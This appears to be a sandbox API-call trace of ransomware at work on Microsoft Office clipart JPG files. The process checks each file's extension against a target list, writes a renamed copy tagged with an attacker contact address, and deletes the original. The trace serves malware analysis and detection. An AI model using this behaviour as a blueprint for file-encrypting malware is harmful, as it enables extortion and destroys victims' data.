	[0163.193] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.193] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0163.193] GetLastError () returned 0x0
	[0163.193] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x9d27, lpOverlapped=0x0) returned 1
	[0163.196] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x9d30, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x9d30, lpOverlapped=0x0) returned 1
	[0163.197] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.197] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.198] SetEndOfFile (hFile=0x1d8) returned 1
	[0163.198] CloseHandle (hObject=0x1d8) returned 1
	[0163.198] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.198] SetEndOfFile (hFile=0x3c4) returned 1
	[0163.200] CloseHandle (hObject=0x3c4) returned 1
	[0163.201] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.201] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0144773.jpg")) returned 1
	[0163.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.201] lstrlenW (lpString=".doc") returned 4
	[0163.201] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.201] lstrlenW (lpString=".docx") returned 5
	[0163.201] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1
	[0163.202] lstrlenW (lpString=".pdf") returned 4
	[0163.202] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.202] lstrlenW (lpString=".xls") returned 4
	[0163.202] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.202] lstrlenW (lpString=".xlsx") returned 5
	[0163.202] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1
	[0163.202] lstrlenW (lpString=".ppt") returned 4
	[0163.202] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.202] lstrlenW (lpString=".zip") returned 4
	[0163.202] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.202] lstrlenW (lpString=".rar") returned 4
	[0163.202] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.202] lstrlenW (lpString=".bz2") returned 4
	[0163.202] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.202] lstrlenW (lpString=".7z") returned 3
	[0163.202] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.202] lstrlenW (lpString=".dbf") returned 4
	[0163.202] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.202] lstrlenW (lpString=".1cd") returned 4
	[0163.202] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.202] lstrlenW (lpString=".jpg") returned 4
	[0163.202] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.202] lstrlenW (lpString=".doc") returned 4
	[0163.202] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.202] lstrlenW (lpString=".docx") returned 5
	[0163.202] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1
	[0163.202] lstrlenW (lpString=".pdf") returned 4
	[0163.202] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.202] lstrlenW (lpString=".xls") returned 4
	[0163.203] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.203] lstrlenW (lpString=".xlsx") returned 5
	[0163.203] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1
	[0163.203] lstrlenW (lpString=".ppt") returned 4
	[0163.203] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.203] lstrlenW (lpString=".zip") returned 4
	[0163.203] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.203] lstrlenW (lpString=".rar") returned 4
	[0163.203] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.203] lstrlenW (lpString=".bz2") returned 4
	[0163.203] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.203] lstrlenW (lpString=".7z") returned 3
	[0163.203] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.203] lstrlenW (lpString=".dbf") returned 4
	[0163.203] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.203] lstrlenW (lpString=".1cd") returned 4
	[0163.203] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 63
	[0163.203] lstrlenW (lpString=".jpg") returned 4
	[0163.203] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.203] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.203] lstrlenW (lpString="J0145168.JPG") returned 12
	[0163.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.204] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=33657) returned 1
	[0163.204] CloseHandle (hObject=0x3c4) returned 1
	[0163.204] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg")) returned 0x20
	[0163.204] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.204] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.204] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0163.205] GetLastError () returned 0x0
	[0163.205] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x8379, lpOverlapped=0x0) returned 1
	[0163.207] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x8380, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x8380, lpOverlapped=0x0) returned 1
	[0163.208] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.208] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.208] SetEndOfFile (hFile=0x1d8) returned 1
	[0163.209] CloseHandle (hObject=0x1d8) returned 1
	[0163.209] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.209] SetEndOfFile (hFile=0x3c4) returned 1
	[0163.211] CloseHandle (hObject=0x3c4) returned 1
	[0163.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.211] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg")) returned 1
	[0163.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.213] lstrlenW (lpString=".doc") returned 4
	[0163.213] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.213] lstrlenW (lpString=".docx") returned 5
	[0163.213] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0163.213] lstrlenW (lpString=".pdf") returned 4
	[0163.213] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.213] lstrlenW (lpString=".xls") returned 4
	[0163.213] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.213] lstrlenW (lpString=".xlsx") returned 5
	[0163.213] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0163.213] lstrlenW (lpString=".ppt") returned 4
	[0163.213] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.213] lstrlenW (lpString=".zip") returned 4
	[0163.213] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.213] lstrlenW (lpString=".rar") returned 4
	[0163.213] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.213] lstrlenW (lpString=".bz2") returned 4
	[0163.213] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.213] lstrlenW (lpString=".7z") returned 3
	[0163.213] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.213] lstrlenW (lpString=".dbf") returned 4
	[0163.213] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.213] lstrlenW (lpString=".1cd") returned 4
	[0163.213] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.214] lstrlenW (lpString=".jpg") returned 4
	[0163.214] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.214] lstrlenW (lpString=".doc") returned 4
	[0163.214] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.214] lstrlenW (lpString=".docx") returned 5
	[0163.214] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0163.214] lstrlenW (lpString=".pdf") returned 4
	[0163.214] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.214] lstrlenW (lpString=".xls") returned 4
	[0163.214] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.214] lstrlenW (lpString=".xlsx") returned 5
	[0163.214] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0163.214] lstrlenW (lpString=".ppt") returned 4
	[0163.214] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.214] lstrlenW (lpString=".zip") returned 4
	[0163.214] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.214] lstrlenW (lpString=".rar") returned 4
	[0163.214] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.214] lstrlenW (lpString=".bz2") returned 4
	[0163.214] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.214] lstrlenW (lpString=".7z") returned 3
	[0163.214] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.215] lstrlenW (lpString=".dbf") returned 4
	[0163.215] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.215] lstrlenW (lpString=".1cd") returned 4
	[0163.215] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 63
	[0163.215] lstrlenW (lpString=".jpg") returned 4
	[0163.215] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.215] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.215] lstrlenW (lpString="J0145212.JPG") returned 12
	[0163.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.220] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=61633) returned 1
	[0163.230] CloseHandle (hObject=0x37c) returned 1
	[0163.230] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg")) returned 0x20
	[0163.230] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.231] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.242] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0163.243] GetLastError () returned 0x0
	[0163.243] ReadFile (in: hFile=0x37c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xf0c1, lpOverlapped=0x0) returned 1
	[0163.246] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xf0d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xf0d0, lpOverlapped=0x0) returned 1
	[0163.248] ReadFile (in: hFile=0x37c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.248] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.248] SetEndOfFile (hFile=0x3f0) returned 1
	[0163.248] CloseHandle (hObject=0x3f0) returned 1
	[0163.249] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.249] SetEndOfFile (hFile=0x37c) returned 1
	[0163.251] CloseHandle (hObject=0x37c) returned 1
	[0163.252] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.252] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg")) returned 1
	[0163.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.253] lstrlenW (lpString=".doc") returned 4
	[0163.253] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.253] lstrlenW (lpString=".docx") returned 5
	[0163.253] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0163.253] lstrlenW (lpString=".pdf") returned 4
	[0163.253] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.253] lstrlenW (lpString=".xls") returned 4
	[0163.253] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.253] lstrlenW (lpString=".xlsx") returned 5
	[0163.253] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0163.253] lstrlenW (lpString=".ppt") returned 4
	[0163.253] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.253] lstrlenW (lpString=".zip") returned 4
	[0163.253] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.253] lstrlenW (lpString=".rar") returned 4
	[0163.253] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.253] lstrlenW (lpString=".bz2") returned 4
	[0163.253] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.253] lstrlenW (lpString=".7z") returned 3
	[0163.253] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.253] lstrlenW (lpString=".dbf") returned 4
	[0163.253] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.253] lstrlenW (lpString=".1cd") returned 4
	[0163.253] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.253] lstrlenW (lpString=".jpg") returned 4
	[0163.253] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.253] lstrlenW (lpString=".doc") returned 4
	[0163.253] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.254] lstrlenW (lpString=".docx") returned 5
	[0163.254] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0163.254] lstrlenW (lpString=".pdf") returned 4
	[0163.254] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.254] lstrlenW (lpString=".xls") returned 4
	[0163.254] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.254] lstrlenW (lpString=".xlsx") returned 5
	[0163.254] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0163.254] lstrlenW (lpString=".ppt") returned 4
	[0163.254] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.254] lstrlenW (lpString=".zip") returned 4
	[0163.254] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.254] lstrlenW (lpString=".rar") returned 4
	[0163.254] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.254] lstrlenW (lpString=".bz2") returned 4
	[0163.254] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.254] lstrlenW (lpString=".7z") returned 3
	[0163.254] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.254] lstrlenW (lpString=".dbf") returned 4
	[0163.254] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.254] lstrlenW (lpString=".1cd") returned 4
	[0163.254] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 63
	[0163.254] lstrlenW (lpString=".jpg") returned 4
	[0163.254] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.254] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.254] lstrlenW (lpString="J0145373.JPG") returned 12
	[0163.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.255] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=17867) returned 1
	[0163.255] CloseHandle (hObject=0x37c) returned 1
	[0163.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg")) returned 0x20
	[0163.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.256] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.256] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
